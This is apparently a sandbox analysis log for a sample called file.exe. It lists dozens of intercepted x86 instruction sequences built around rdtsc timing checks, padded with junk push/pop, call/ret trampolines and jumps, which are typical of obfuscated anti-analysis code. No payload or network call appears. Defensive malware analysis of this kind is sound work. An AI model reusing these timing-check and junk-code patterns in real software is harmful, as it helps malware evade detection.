Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBF02D second address: CBF032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBF032 second address: CBF037 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBF037 second address: CBF053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F1BE4ECC06Eh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBE3EF second address: CBE3F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBE3F3 second address: CBE3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBE3F9 second address: CBE42A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1BE47673D9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F1BE47673CEh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBFC42 second address: CBFC47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBFC47 second address: CBFC77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F1BE47673C6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jbe 00007F1BE47673C6h 0x00000017 jmp 00007F1BE47673D8h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBFC77 second address: CBFC81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F1BE4ECC066h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBF937 second address: CBF967 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1BE47673CDh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F1BE47673D2h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC0535 second address: CC0543 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1BE4ECC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC6DB6 second address: CC6E19 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F1BE47673C8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 or edi, 6A9D861Bh 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F1BE47673C8h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 xor dword ptr [ebp+122D2892h], esi 0x0000004d push 00000000h 0x0000004f mov edi, eax 0x00000051 push eax 0x00000052 jnl 00007F1BE47673D0h 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC7EB5 second address: CC7EBF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1BE4ECC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC8E84 second address: CC8E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC8E88 second address: CC8E8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCBEDB second address: CCBF4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F1BE47673C8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007F1BE47673C8h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 0000001Bh 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 push 00000000h 0x00000042 mov dword ptr [ebp+122D2E00h], ebx 0x00000048 mov dword ptr [ebp+122D2AD8h], eax 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F1BE47673CAh 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCCF58 second address: CCCF5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCEF02 second address: CCEF60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F1BE47673D4h 0x0000000b nop 0x0000000c xor edi, dword ptr [ebp+122D2AC8h] 0x00000012 push 00000000h 0x00000014 movsx ebx, si 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F1BE47673C8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 mov ebx, edi 0x00000035 push eax 0x00000036 jl 00007F1BE47673D8h 0x0000003c push eax 0x0000003d push edx 0x0000003e jg 00007F1BE47673C6h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCFF9C second address: CCFFA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD1FA0 second address: CD1FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1BE47673C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD1FAB second address: CD1FB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD1FB1 second address: CD1FB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD1FB5 second address: CD205E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnp 00007F1BE4ECC081h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F1BE4ECC068h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F1BE4ECC068h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 call 00007F1BE4ECC077h 0x0000004b mov bx, 56A1h 0x0000004f pop ebx 0x00000050 mov ebx, ecx 0x00000052 push 00000000h 0x00000054 xor bh, 00000001h 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F1BE4ECC072h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD205E second address: CD2064 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD41E0 second address: CD41E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD41E7 second address: CD4255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F1BE47673C8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000000h 0x00000024 movzx edi, ax 0x00000027 mov ebx, 7F9389E1h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007F1BE47673C8h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 00000016h 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 mov edi, dword ptr [ebp+122D3B92h] 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F1BE47673D4h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD21E4 second address: CD21E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD3211 second address: CD3216 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD3216 second address: CD3234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1BE4ECC073h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD3234 second address: CD323E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD323E second address: CD3242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD44BA second address: CD44BF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD61B2 second address: CD61B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD7609 second address: CD760D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD760D second address: CD7613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6303 second address: CD6308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6308 second address: CD630E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD630E second address: CD631C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD631C second address: CD632F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BE4ECC06Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD632F second address: CD6335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6335 second address: CD6339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDD957 second address: CDD95D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDD2D5 second address: CDD2E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDD2E0 second address: CDD2E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDD2E4 second address: CDD2EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDD454 second address: CDD47A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BE47673CDh 0x00000009 jnl 00007F1BE47673C6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jno 00007F1BE47673CCh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDD47A second address: CDD486 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1BE4ECC06Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDD486 second address: CDD494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jl 00007F1BE47673C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE374A second address: CE374E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE374E second address: CE3771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F1BE47673D8h 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6D4FA second address: C6D52E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1BE4ECC06Eh 0x00000008 jmp 00007F1BE4ECC06Fh 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F1BE4ECC06Ch 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6D52E second address: C6D534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEBDE0 second address: CEBDE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEBDE6 second address: CEBDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F1BE47673C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEC647 second address: CEC681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 jmp 00007F1BE4ECC077h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1BE4ECC074h 0x00000013 jng 00007F1BE4ECC066h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEC681 second address: CEC698 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEC82C second address: CEC830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEC830 second address: CEC834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF33D4 second address: CF33DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF33DA second address: CF33DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF200A second address: CF2029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007F1BE4ECC06Dh 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jp 00007F1BE4ECC066h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF23F9 second address: CF23FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF2686 second address: CF2690 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1BE4ECC066h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF3292 second address: CF329E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF1C98 second address: CF1C9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF7D89 second address: CF7DA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1BE47673D4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF7DA6 second address: CF7DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF6BF3 second address: CF6C19 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1BE47673D8h 0x00000008 jmp 00007F1BE47673D0h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007F1BE47673CEh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF6C19 second address: CF6C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F1BE4ECC066h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF6C29 second address: CF6C50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CCh 0x00000007 jmp 00007F1BE47673D7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF6C50 second address: CF6C55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF6C55 second address: CF6C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF6C5B second address: CF6C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F1BE4ECC073h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1073 second address: CC1079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1079 second address: CC107D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC15F8 second address: CC160A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC16C4 second address: CC16C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC16C9 second address: CC16D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC16D0 second address: CC16E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F1BE4ECC066h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC16E4 second address: CC16F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F1BE47673CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC16F2 second address: CC16FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1A09 second address: CC1A0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1A0E second address: CC1A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F1BE4ECC066h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1B05 second address: CC1B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1EDC second address: CC1F43 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F1BE4ECC068h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 or edi, dword ptr [ebp+122D3D8Ah] 0x0000002a sub ecx, 425C80C3h 0x00000030 push 0000001Eh 0x00000032 mov ecx, 2BB49F5Eh 0x00000037 nop 0x00000038 jbe 00007F1BE4ECC07Fh 0x0000003e jmp 00007F1BE4ECC079h 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push esi 0x00000047 push edx 0x00000048 pop edx 0x00000049 pop esi 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC2203 second address: CC2209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC2209 second address: CC220D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
